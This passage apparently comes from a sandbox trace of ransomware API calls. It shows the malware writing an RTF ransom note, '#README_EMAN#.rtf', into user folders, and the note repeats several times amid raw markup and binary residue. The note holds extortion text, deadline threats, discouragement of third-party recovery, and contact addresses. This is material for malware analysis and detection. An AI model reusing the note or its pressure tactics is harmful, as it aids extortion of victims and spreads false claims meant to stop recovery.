ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.849] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.850] CloseHandle (hObject=0x2c8) returned 1 [0278.850] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0278.850] GetLastError () returned 0x2 [0278.850] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 